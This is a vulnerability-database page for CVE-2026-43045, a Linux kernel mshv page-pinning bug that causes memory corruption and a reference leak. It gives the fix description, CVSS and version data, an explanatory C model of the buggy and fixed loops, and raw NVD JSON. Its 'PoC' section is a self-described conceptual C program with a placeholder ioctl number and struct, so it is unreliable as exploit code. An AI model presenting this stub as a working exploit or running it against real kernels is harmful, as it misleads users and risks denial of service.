Security Vulnerability Report
CVE-2026-43045 CVSS 5.5 MEDIUM

CVE-2026-43045

Published: 2026-05-01 15:16:51
Last Modified: 2026-05-08 14:04:13
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

mshv: Fix error handling in mshv_region_pin

The current error handling has two issues:

First, pin_user_pages_fast() can return a short pin count (less than requested but greater than zero) when it cannot pin all requested pages. This is treated as success, leading to partially pinned regions being used, which causes memory corruption.

Second, when an error occurs mid-loop, already pinned pages from the current batch are not properly accounted for before calling mshv_region_invalidate_pages(), causing a page reference leak.

Treat short pins as errors and fix partial batch accounting before cleanup.
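As an added illustration (not the kernel's mshv code and not part of the NVD record), the constructed user-space model below contrasts the loop shape the commit message describes with its fixed form: mock_pin stands in for pin_user_pages_fast() and can return a short count or an error, invalidate_pages stands in for mshv_region_invalidate_pages(), and a reference counter exposes both the unnoticed short pin and the leaked partial batch. The batch/chunk split, the budget knob and all names are assumptions of this example.

```c
#include <errno.h>

/* Constructed model of the two error-handling bugs named in the commit
 * message; not kernel code. A "pin" is a counter increment, so a leaked
 * reference shows as refs_held != 0 after a failed call. Assumes total is a
 * multiple of batch and batch a multiple of chunk. */
static long refs_held;   /* pins currently outstanding */
static long mock_budget; /* pages the mock can still pin; 0 forces -EFAULT */
/* Stand-in for pin_user_pages_fast(): returns the number of pages pinned,
 * which may be fewer than requested, or a negative errno if none could be. */
static long mock_pin(long n)
{
    if (mock_budget <= 0) return -EFAULT;
    long got = n < mock_budget ? n : mock_budget;
    mock_budget -= got; refs_held += got;
    return got;
}
/* Stand-in for mshv_region_invalidate_pages(): drops n pins. */
static void invalidate_pages(long n) { refs_held -= n; }

/* Buggy pattern: a short pin is taken as success, and on error only whole
 * completed batches are cleaned up, so pins from the current batch leak. */
static int pin_buggy(long total, long batch, long chunk, long budget)
{
    long accounted = 0;                        /* whole batches completed */
    refs_held = 0; mock_budget = budget;
    for (long b = 0; b < total; b += batch) {
        for (long c = 0; c < batch; c += chunk) {
            long r = mock_pin(chunk);
            if (r < 0) { invalidate_pages(accounted); return -1; }
            /* r < chunk is ignored: the region is used partly unpinned */
        }
        accounted += batch;
    }
    return 0;
}

/* Fixed pattern: a short pin is an error, and pins from the current batch
 * are added to the count before cleanup so nothing leaks. */
static int pin_fixed(long total, long batch, long chunk, long budget)
{
    long accounted = 0, in_batch = 0;
    refs_held = 0; mock_budget = budget;
    for (long b = 0; b < total; b += batch, in_batch = 0) {
        for (long c = 0; c < batch; c += chunk) {
            long r = mock_pin(chunk);
            if (r > 0) in_batch += r;          /* partial batch accounting */
            if (r != chunk) { invalidate_pages(accounted + in_batch); return -1; }
        }
        accounted += batch;
    }
    return 0;
}
```

With a region of 8 pages pinned in batches of 4 and chunks of 2, a budget of 7 makes the buggy version report success with one page never pinned, and a budget of 6 makes it leave two pins outstanding after its cleanup; the fixed version fails cleanly with zero pins outstanding in both cases.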

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (versions from 6.15 up to, but excluding, 6.19.12)
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:* - VULNERABLE
Linux Kernel (stable branch, before commit a7d149152bc5a9119854331c57be35ad31fdf5cc)
Linux Kernel (stable branch, before commit c0e296f257671ba10249630fe58026f29e4804d9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Conceptual PoC for CVE-2026-43045
// This code attempts to trigger the vulnerability in mshv_region_pin
// by invoking the ioctl with crafted parameters.

#define MSHV_IOCTL_PIN_REGION 0x1234 // Example IOCTL number

struct mshv_pin_region_args {
    unsigned long addr;
    unsigned long size;
    // ... other fields ...
};

int main() {
    int fd;
    struct mshv_pin_region_args args;

    // Open the mshv device (requires appropriate privileges or access)
    fd = open("/dev/mshv", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Craft arguments to potentially trigger short pin or error
    // Using a very large size or unmapped address might trigger the path
    args.addr = (unsigned long)malloc(4096);
    args.size = 0xFFFFFFFF; // Large size to stress pin_user_pages_fast

    printf("Attempting to trigger vulnerability...\n");

    // Invoke the vulnerable ioctl
    if (ioctl(fd, MSHV_IOCTL_PIN_REGION, &args) < 0) {
        perror("IOCTL failed (expected if system patched or conditions not met)");
    } else {
        printf("IOCTL succeeded. Check kernel logs for memory corruption.\n");
    }

    close(fd);
    return 0;
}

References

https://git.kernel.org/stable/c/a7d149152bc5a9119854331c57be35ad31fdf5cc (Patch)
https://git.kernel.org/stable/c/c0e296f257671ba10249630fe58026f29e4804d9 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43045", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:50.817", "lastModified": "2026-05-08T14:04:13.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmshv: Fix error handling in mshv_region_pin\n\nThe current error handling has two issues:\n\nFirst, pin_user_pages_fast() can return a short pin count (less than\nrequested but greater than zero) when it cannot pin all requested pages.\nThis is treated as success, leading to partially pinned regions being\nused, which causes memory corruption.\n\nSecond, when an error occurs mid-loop, already pinned pages from the\ncurrent batch are not properly accounted for before calling\nmshv_region_invalidate_pages(), causing a page reference leak.\n\nTreat short pins as errors and fix partial batch accounting before\ncleanup."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.19.12", "matchCriteriaId": "53D0D203-C2F0-46AD-8120-3BDF390DC90C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": 
"F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/a7d149152bc5a9119854331c57be35ad31fdf5cc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c0e296f257671ba10249630fe58026f29e4804d9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}